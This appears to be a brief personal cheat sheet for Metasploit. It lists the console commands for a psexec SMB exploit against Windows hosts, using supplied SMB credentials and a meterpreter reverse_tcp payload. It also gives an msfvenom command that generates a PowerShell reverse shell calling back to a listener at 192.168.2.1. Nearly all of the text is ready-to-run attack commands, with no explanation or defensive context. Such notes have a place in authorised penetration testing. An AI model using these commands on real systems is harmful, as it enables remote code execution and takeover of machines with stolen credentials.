metasploit

use msfconsole for a psexec session

use exploit/windows/smb/psexec
set RHOST, SMBUser, SMBPass, smbdomain
set payload windows/x64/meterpreter/reverse_tcp
show targets -> set option:2 (native upload)
run

msfvenom

Create powershell based reverse shell

$ msfvenom -p windows/x64/meterpreter_reverse_tcp -f psh LHOST=192.168.2.1 -o payload.ps1